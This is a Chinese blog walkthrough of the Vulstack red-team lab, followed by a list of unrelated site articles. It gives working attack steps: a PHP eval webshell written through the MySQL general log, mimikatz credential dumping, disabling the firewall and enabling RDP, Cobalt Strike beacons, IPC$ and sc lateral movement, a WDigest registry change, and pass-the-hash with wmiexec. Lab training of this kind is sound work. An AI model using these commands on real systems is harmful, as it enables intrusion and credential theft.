Vulstack红队评估(一)

文章目录

  • 一、环境搭建
    • 1、网络拓扑
    • 2、web服务器(win7)配置
    • 3、域控(winserver2008)配置
    • 4、域内机器(windows 2003)配置
    • 5、调试网络是否通常
  • 二、web渗透
    • 1、信息搜集
    • 2、端口扫描
    • 3、目录扫描
    • 4、弱口令
    • 5、phpmyadmin getshell
        • 日志getshell
    • 6、远程桌面连接
      • 开启3389端口
      • 关闭防火墙
      • 内存密码抓取
      • 远程桌面登录
  • 三、内网渗透
    • 1、内网信息收集
    • 2、蚁剑上线到CS
    • 3、内网横向——IPC$管道
    • 4、使用CS自带SMB Beacon上线不出网机器
    • 5、远程连接域控
  • 四、windows认证
    • 1、windows认证流程
    • 2、抓取SAM文件中的hash值
    • 3、 NTLM-HASH
      • 1、介绍
      • 2、NTLM Hash加密过程
    • 4、lsass.exe内存抓取密码
    • 5、LM-HASH
      • 1、介绍
      • 2、LM-Hash加密过程
    • 6、高版本密码抓取
    • 7、PTH攻击(hash传递攻击)

一、环境搭建

1、网络拓扑

在这里插入图片描述

在这里插入图片描述

2、web服务器(win7)配置

首先准备两个网卡vmnet2vmnet4,其中vmnet4用于连接外网(连接物理机),vmnet2用于连接外网。具体网卡配置如下:
在这里插入图片描述
在这里插入图片描述
然后win7充当web服务器,拥有vmnet2vmnet4,手动设置vmnet4IP为192.168.111.128vmnet2IP为192.168.52.143。**注意:vmnet2的DNS服务器地址为域控。**具体配置如下:
在这里插入图片描述

在这里插入图片描述

关闭win7上的防火墙,物理机可以ping通192.168.111.128,ping不通192.168.52.143。记得开启防火墙~

在这里插入图片描述

3、域控(winserver2008)配置

网卡设置为内网网卡vmnet2
在这里插入图片描述
登录域控的时候,首先用Administrator hongrisec@2019登录,然后需要更改密码,这里改为hongrisec@2024
在这里插入图片描述
查看域控ip是否为1922.168.52.138.
在这里插入图片描述

4、域内机器(windows 2003)配置

网卡设置为内网网卡vmnet2
在这里插入图片描述
注意:刚刚在域控上改了Administrator的密码,域内所有主机Administrator的密码都被改了,这里密码为hongrisec@2024

在这里插入图片描述
确定IP为192.168.52.141.
在这里插入图片描述
!!!配置好上述之后,要重启win7主机,使用hongrisec@2024进行登录。

5、调试网络是否通常

在win7和winsever 2003上使用net user /domain查看域用户:
在这里插入图片描述

在这里插入图片描述
正常情况下,物理机只能通过ping 192.168.111.128ping通web服务器(win 7),域内机器是可以互ping,而物理机是ping不通域内机器的。
在这里插入图片描述

二、web渗透

1、信息搜集

信息搜集主要搜集以下信息:

  • IP地址
  • 子域名
  • 目录结构
  • JS信息
  • APP和小程序
  • 端口
  • 旁站
  • C端
  • whois信息
  • 公司结构
  • 公司相关手机、邮箱

2、端口扫描

常见端口及其对应的服务:
在这里插入图片描述
这里使用nmap进行端口扫描,命令如下:

nmap -p- -sV -A 192.168.111.128

在这里插入图片描述
可以看到网站开放了80、135、139、445、3306端口。

3、目录扫描

这里用御剑进行网站目录扫描
在这里插入图片描述
根据扫描结果,主要是phpinfo页面phpmyadminbeifen.rar

4、弱口令

访问phpmyadmin页面,尝试弱口令root/root,成功登录~~

5、phpmyadmin getshell

日志getshell

mysql5.0版本以上会创建日志,可以通过修改日志的全局变量getshell。

检测全局变量(general_log、general_log file)
使用如下命令:

show variables like 'genral%'

在这里插入图片描述

  • general log指的是日志保存状态,ON代表开启,OFF代表关闭;
  • general log file 指的是日志的保存路径。

开启日志
开启general_log作用:开启它可以记录用户输入的每一条命令,并且将其保存在general_log_file指向的文件中,也就是日志文件。

利用思路:开启general_log之后,把general_log_file的值修改为网站默认路径下的某个php文件中,并将一句话木马写入日志文件中。

根据php探针,我们可以知道网站目录C://phpStudy/WWW/1.php,所有将general_log_file=C://phpStudy/WWW/shell.php
在这里插入图片描述

set global general_log = "ON"; # 开启日志
set global general_log_file= "C:/phpStudy/WWW/shell.php"; # 更改日志路径

在这里插入图片描述
这时候我们访问192.168.111.128/shell.php,可以看到mysql的日志内容。
在这里插入图片描述
写入一句话木马
在SQL执行环境中,写入一句话木马select <?php @eval($_POST[1]);?>
在这里插入图片描述
连接shell
连接密码就是post传输的参数~

在这里插入图片描述
点击添加后,即可用蚁剑连接到一句话木马。
在这里插入图片描述

6、远程桌面连接

要想远程桌面连接,需要解决三个问题:

  1. 开启3389端口;
  2. 知道防火墙用户名和密码;
  3. 关闭靶机防火墙。

开启3389端口

根据端口扫描的结果,目标机器没有开启3389端口,也可以在命令行中用netstat -ano命令查看以开放的端口。

  • -a:显示所有选项,默认不显示LISTEN相关;
  • -n:拒绝显示别名,能显示数字的全部转化成数字;
  • -o:显示计时器。
    在这里插入图片描述
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f # 开启3389端口

在这里插入图片描述
在这里插入图片描述

关闭防火墙

netsh firewall show state # 查看防火墙状态
netsh firewall set opmode disable # 关闭防火墙

可见防火墙状态:开启。
在这里插入图片描述
关闭防火墙。
在这里插入图片描述

内存密码抓取

首先通过蚁剑上传mimikatz到目标主机.
在这里插入图片描述

mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit"

mimikatz常见命令如下:

cls清屏
exit退出
version查看mimikatz的版本
system::user查看当前登录的系统用户
system::computer查看计算机名称
process::list列出进程
process::suspend 进程名称暂停进程
process::stop 进程名称结束进程
process::modules列出系统的核心模块及所在位置
service::list列出系统的服务
service::remove移除系统的服务
service::start stop 服务名称启动或停止服务
privilege::list列出权限列表
privilege::enable激活一个或多个权限
privilege::debug提升权限
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
ts::sessions显示当前的会话
ts::processes显示进程和对应的pid情况等
sekurlsa::wdigest获取本地用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
sekurlsa::logonPasswords获登陆用户信息及密码

在这里插入图片描述

远程桌面登录

输入用户名GOD\Administrator,密码hongridec@2019,成功连接。
在这里插入图片描述
在这里插入图片描述

对方电脑会锁屏!
在这里插入图片描述

三、内网渗透

内网中电脑的分布形式有两种:工作组和域环境(域控进行统一的管理)。

1、内网信息收集

收集用户信息

whoami # 查看当前用户信息
hostname # 查看当前设备主机名
net user # 查看本地用户
net user /domain # 查看域用户,向域控去查询

因为主机名为stu1,按道理本地管理员应该是stu1\administrator,所以god\administrator是一个域账号。本地账号的命名方式:主机名\本地用户名。域账号的命名方式:域名\域账号名
在这里插入图片描述
在这里插入图片描述

  • 域账号:在域控制器(Domain Controller)上创建和管理的账号,域账号的权限和访问控制由域控制器管理。
  • 本地账号:在单个计算机上创建和管理的账号,本地账号只能在特定计算机上使用,不能跨计算机使用。

收集域名信息

systeminfo # 查看域名信息

在这里插入图片描述
收集域内机器数

net group "domain computers" /domain # 向域控询问当前域环境中有多少设备

当前域内存在三台电脑:DEV1ROOT-TV1862UBEHSTU1
在这里插入图片描述
查询域控IP及域名

nslookup -type=SRV _ldap._tcp

在这里插入图片描述
查询域内机器IP

arp -a # 查看当前计算机上的arp缓存表
ping <主机名>

在这里插入图片描述
在这里插入图片描述

2、蚁剑上线到CS

Cobalt Strike部署–Windows
192.168.111.1是物理机在vmnet4网卡下的ip地址。
在这里插入图片描述
添加监听器
在这里插入图片描述
在这里插入图片描述

生成木马
在这里插入图片描述
在这里插入图片描述
保存到桌面,木马名为shell.exe

蚁剑上传木马,并运行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
sleep改为1。目前不知道为什么?
在这里插入图片描述

3、内网横向——IPC$管道

横向移动技术有:利用远控工具横向;IPC$横向移动;PTH哈希传递攻击;PTK密钥传递攻击;PTT票据传递攻击;PSexec工具横向移动;SMB工具横向移动;WinRM命令横向移动;WMI命令横向移动。

IPC简介
IPC(internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程登录计算机和查看计算机的共享资源时使用。

通过IPC$,可以与目标机器建立连接,利用该连接,不仅可以访问目标机器的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
在这里插入图片描述

在CS中直接运行run mimikatz抓取当前主机的用户名和密码。
在这里插入图片描述
与域控建立IPC管道

net use \\<域控域名>\IPC$ "<登录密码>" /user:<登录用户> # 与域控建立IPC管道# 具体命令
net use \\owa.god.org\IPC$ "hongrisec@2024" /user:god\administrator

在这里插入图片描述

net use # 查看网络共享连接

在这里插入图片描述

copy shell.exe \\owa.god.org\C$ # 将web服务器上的cs木马远程复制到域控的c盘下

在这里插入图片描述

4、使用CS自带SMB Beacon上线不出网机器

隧道部分知识:反弹shell、端口转发、端口映射、正向连接、反向连接、DNS隧道、socks隧道、HTTP隧道、ICMP隧道…

创建监听器
在这里插入图片描述
生成相应的木马
在这里插入图片描述
在这里插入图片描述

将木马传到域控上
先将木马用CS上传到web服务器上,再通过IPC管道上传到域控上。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
域控运行smb木马

  思路:远程创建服务,远程执行服务。

sc \\owa.god.org create test binpath= "cmd.exe /c c:\smb.exe" # 创建服务# sc:是Windows系统中的一个命令行工具,用于管理和配置系统服务。
# create:是 sc 命令的参数之一,指示要创建一个新的服务。
# test:表示要创建的新服务的名称,这里将其命名为 "test"。
# binpath=:是 sc 命令的参数之一,用于指定服务的二进制路径。
# "cmd.exe /c c:\smb.exe":是要作为服务的二进制路径的值。这里使用了 cmd.exe 命令解释器,/c 参数表示在执行完命令后立即退出,并指定了一个名为 smb.exe 的可执行文件的路径(在C盘根目录下)。

在这里插入图片描述

sc \\owa.god.org start test # 远程运行服务
link owa.god.org

在这里插入图片描述
域控成功上线~
在这里插入图片描述

5、远程连接域控

# 开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f # 查看防火墙状态
netsh firewall show state 
# 关闭防火墙
netsh firewall set opmode disable 

在这里插入图片描述
在这里插入图片描述

# 在web服务器上运行,将192.168.52.138的3389流量转发到192.168.52.143(web服务器)的9999端口
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectport=3389 connectaddress=192.168.52.138# netsh是用于配置网络设置的Windows命令行工具。
# interface portproxy指示netsh工具执行端口代理配置。
# add v4tov4表示将添加一个IPv4到IPv4的端口代理。
# listenaddress=0.0.0.0指定监听地址为0.0.0.0,这表示将监听所有可用的网络接口。
# listenport=9999指定要监听的本地端口号为9999。
# connectport=3389指定要连接的远程目标端口号为3389。
# connectaddress=192.168.52.138指定要连接的远程目标地址为192.168.52.138。# 查看是否配置成功
netsh interface portproxy show v4tov4

在这里插入图片描述
在web服务器上运行~
在这里插入图片描述

在这里插入图片描述

四、windows认证

1、windows认证流程

windows认证流程图解:
在这里插入图片描述

  • windows Logon Process(即winlogon.exe):是windows NT 用户登录程序,用于管理用户登录和退出。用户注销、重启、锁屏后,操作系统会让winlogon.exe显示登录界面。
  • lsass.exe是一个系统进程,用于微软windows系统的安全机制。它用于本地安全和登录策略。1、将winlogon传过来的明文账号密码进行加密,然后和SAM文件中的密文账号密码进行对比,对比成功则登录;2、将收到的明文账号密码在本地内存中保留一份作备用。

    要想获取windows账号密码,要么读取SAM文件;要么查看内存中保存的明文账号和密码。

  • SAM文件是位于C:\windows\system32\config\目录下的,用于存储本地所有用户的凭证信息。普通人:不能删、不能改、不能看、不能复制该文件

完整登录流程:
在这里插入图片描述

2、抓取SAM文件中的hash值

使用mimikatz读取SAM文件中的密码

mimikatz.exe # 运行mimikatz.exe
privilege::debug # Mimikatz提升当前进程的调试特权,调试特权允许进程访问和操作其他进程的内存和资源
token::elevate # Mimikatz获取到当前进程的访问令牌,并将其权限级别提升到最高级别,即系统级别
lsadump::sam # 读取sam文件

在这里插入图片描述

这里读取的是本地SAM文件~

3、 NTLM-HASH

1、介绍

NTLM Hash是微软为了提高安全性的同时保证兼容性而设计的散列加密算法,NTLM Hash是基于MD4加密算法进行加密的。个人版从windows vista以后,服务器版从windows server 2003以后,windows操作系统的认证方式均为NTLM Hash

2、NTLM Hash加密过程

  • 将明文口令转换成十六进制格式;
  • 将16进制转化成unicode格式(每两位加00);
  • 对unicode字符串作MD4加密。

4、lsass.exe内存抓取密码

mimikatz.exe # 运行mimikatz.exe
privilege::debug # Mimikatz提升当前进程的调试特权,调试特权允许进程访问和操作其他进程的内存和资源
sekurlsa::logonPasswords # 抓取内存中的明文账号和密码

成功读取用户名和密码~
在这里插入图片描述

这里抓取的是域用户的内存密码!

5、LM-HASH

1、介绍

windows操作系统通常使用两种方法对用户的明文密码进行加密处理,一部分为LM-Hash,另一部分为NTLM-Hash。为了解决LM加密和身份验证方案中固有的安全弱点,微软于1993年在Windows NT 3.1中引入NTLM协议。下面是各个版本对LM和NTLM的支持:
在这里插入图片描述

2、LM-Hash加密过程

在这里插入图片描述
在这里插入图片描述
6、每7组bit为单位,后面加一个0;
在这里插入图片描述

6、高版本密码抓取

使用上述方法,mimikatz默认情况抓取不到win10的明文密码。
在这里插入图片描述
在windows2012及以上的系统,默认在内存缓存中禁止保存明文密码。可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取~

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在这里插入图片描述
在这里插入图片描述

7、PTH攻击(hash传递攻击)

适用:win10、win8、win11、win 2012都可以使用。

情景:在内网中因为员工很多电脑就很多,很多网络管理员在安装系统时都会采用相同的账号密码,如果账号密码相同,NTLM-Hash值也就相同,我们可以利用明文或NTLM-Hash进行认证,从而实现远程控制对方电脑。

横向移动工具:PSEXEC、WMIEXEC、SMBEXEC

wmiexec.exe <用户名>:<密码>@<ip> # 明文认证
wmiexec.exe -hashes LM-Hash:NTLM-Hash <用户名>@<ip> # NTLM-Hash认证

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/9489.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OBS插件--声音波形显示

声音波形显示 波形显示是一个可以定制化的动态音频频谱图案&#xff0c;可以多音频进行可视化&#xff0c;对于音乐类主播必不可少&#xff0c;通过灵活的配置选项可以设计出非常个性化的频谱图形。 下面截图演示下操作步骤&#xff1a; 首先&#xff0c;打开 OBS直播助手 在…

探索生命奥秘的新征程:谷歌AlphaFold 3发布!

大家好&#xff01;今天和大家分享的是让人热血沸腾的消息——谷歌AlphaFold 3的发布&#xff01;这次的新版本可不仅仅是一次升级&#xff0c;而是一次生物科技的革命&#xff01; 回顾一下AlphaFold系列的历程&#xff0c;从AlphaFold 1的问世到AlphaFold 2的惊艳登场&#…

ChatGPT Web Midjourney一键集成最新版

准备工具 服务器一台 推荐使用浪浪云服务器 稳定 安全 有保障 chatgpt api 推荐好用白嫖的api 项目演示 项目部署 浏览器访问casaos 添加软件原添加 https://gitee.com/langlangy_1/CasaOS-AppStore-LangLangy/raw/master/chatmjd.zip 安装此软件 等待安装 安装后再桌面设置…

信息安全技术-分析题【太原理工大学】

没有历年题或明确说明大题会考什么&#xff0c;以下为个人猜测 简答题和选择判断占60&#xff0c;认真看题库和总结&#xff0c;能过d(^_^o) 好像说是加解密这类题会给公式让你直接套&#xff0c;但还是看一下基本原理&#xff0c;要不到时候蒙圈 1.加密算法步骤 图 1 是一个采…

Spring Boot | Spring Boot 整合 “异步任务“ 的实现

目录&#xff1a; 一、异步任务1.1 "无返回值" 异步任务调用 :① 创建项目② 编写 "异步调用方法" ( 使用 Async 注解 )③ "主程序启动类"中 开启基于 "注解" 的异步任务支持 ( 使用EnableAsync注解 )④ 编写 "控制层" 相关…

从0到1构建AI agent【零代码】

一、前言 想象一下&#xff0c;如果AI的想象力被彻底释放&#xff0c;那将是一场怎样的革命&#xff1f;“大语言模型不过是个贪吃蛇&#xff0c;而AI Agent却能创造出‘王者荣耀’。”这不仅是网上的一句戏言&#xff0c;它预示着一个不可逆转的趋势。比尔盖茨更是一语中的&am…

【全开源】Java共享台信息共享系统源码

特色功能 信息整合与共享&#xff1a;该平台提供一站式信息整合服务&#xff0c;将各种类型的信息资源进行汇聚&#xff0c;方便用户快速查找和获取所需资源。多种共享功能&#xff1a;支持信息共享、共享车位、共享会议室、共享电动车等多种共享功能&#xff0c;提高资源利用…

【Linux】18. 进程间通信 --- System V IPC(选学)

System V IPC System V 消息队列System V 共享内存System V 信号量 system V 共享内存 共享内存区是最快的IPC形式。一旦这样的内存映射到共享它的进程的地址空间&#xff0c;这些进程间数据传递不再涉及到内核。 换句话说是进程不再通过执行进入内核的系统调用来传递彼此的数据…

云南区块链商户平台优化开发

背景 云南区块链商户平台是全省统一区块链服务平台。依托于云南省发改委、阿里云及蚂蚁区块链的国内首个省级区块链平台——云南省区块链平台同步上线&#xff0c;助力数字云南整体升级。 网页版并不适合妈妈那辈人使用&#xff0c;没有记忆功能&#xff0c;于是打算自己开发…

k8s介绍

一、前言 Kubernetes&#xff08;通常简称为 K8s&#xff09;是一个开源的容器编排平台&#xff0c;用于自动化部署、扩展和管理容器化应用程序&#xff0c;它提供了丰富的功能使得用户能够轻松地管理大规模的容器集群&#xff0c;包括自动化部署和扩展、服务发现和负载均衡、存…

漫威争锋Marvel Rivals怎么搜索 锁区怎么搜 游戏搜不到怎么办

即将问世的《漫威争锋》&#xff08;Marvel Rivals&#xff09;作为一款万众期待的PvP射击游戏新星&#xff0c;荣耀携手漫威官方网站共同推出。定档5月11日清晨9时&#xff0c;封闭Alpha测试阶段将正式揭开序幕&#xff0c;持续时间长达十天之久。在此首轮测试窗口&#xff0c…

一个开源即时通讯源码

一个开源即时通讯源码 目前已经含服务端、PC、移动端即时通讯解决方案&#xff0c;主要包含以下内容。 服务端简介 不要被客户端迷惑了&#xff0c;真正值钱的是服务端&#xff0c; 服务是采用Java语言开发&#xff0c;基于spring cloud微服务体系开发的一套即时通讯服务端。…

栈结构(c语言)

1.栈的概念 栈&#xff1a;一种特殊的线性表&#xff0c;其只允许在固定的一端进行插入和删除元素操作。进行数据插入和删除操作的一端称为栈顶&#xff0c;另一端称为栈底。栈中的数据元素遵守后进先出LIFO&#xff08;Last In First Out&#xff09;的原则。 压栈&am…

STM32的ADC详解

ADC即模拟数字转换器&#xff0c;通常用于将外部的模拟量信号转换为数字信号。STM32的ADC是12位逐次逼近型的模拟数字转换器&#xff0c;最大可以计数到4095&#xff0c;有18个通道&#xff0c;16个外部通道和2个内部通道。 ADC框图 ADC的功能框图可以分为七个部分&#xff1a…

记一次springboot jpa更新复杂几何类型报错Only simple geometries should be used

问题&#xff1a; 更新数据时&#xff0c; 几何字段MultiPolygon类型时报错&#xff1b; java.lang.IllegalStateException: Only simple geometries should be used 几何字段Point类型时不报错&#xff1b; 新增时字段存在MultiPolygon不报错。 查看日志可知&#xff0c;…

vscode 使用正则搜索

ctrl c 复制&#xff0c;内容如下&#xff1a; Vue3简介创建Vue3工程Vue3核心语法路由pinia组件通信其它 APIVue3新组件

Go 单元测试完全指南(一)- 基本测试流程

为什么写单元测试&#xff1f; 关于测试&#xff0c;有一张很经典的图&#xff0c;如下&#xff1a; 说明&#xff1a; 测试类型成本速度频率E2E 测试高慢低集成测试中中中单元测试低快高 也就是说&#xff0c;单元测试是最快、最便宜的测试方式。这不难理解&#xff0c;单元…

Baidu Comate:让编码实现无限可能

目录 1 背景介绍2 快速入门2.1 智能推荐功能2.2 智能生成功能2.2.1 智能注释2.2.2 智能生成2.2.3 智能调优2.2.4 代码解释 3 高兼容性4 即刻体验 1 背景介绍 Baidu Comate&#xff08;智能代码助手&#xff09;是基于文心大模型&#xff0c;结合百度积累多年的编程现场大数据和…

【MySQL数据库】丨一文详解 JdbcTemplate(Spring中的CRUD)

前言 JdbcTemplate 是 Spring框架 中提供的一个对象&#xff0c;用于简化JDBC操作。它使得数据库操作变得更为简单和方便&#xff0c;大大提高了开发效率。 文章目录 前言为何要使用JdbcTemplate在JdbcTemplate中执行SQL语句的方法大致分为3类&#xff1a;案例代码 JdbcTemplat…

word 毕业论文格式调整

添加页眉页脚 页眉 首先在页面上端页眉区域双击&#xff0c;即可出现“页眉和页脚”设置页面&#xff1a; 页眉左右两端对齐 如果想要页眉页脚左右两端对齐&#xff0c;可以选择添加三栏页眉&#xff0c;然后将中间那一栏删除&#xff0c;即可自动实现左右两端对齐&#x…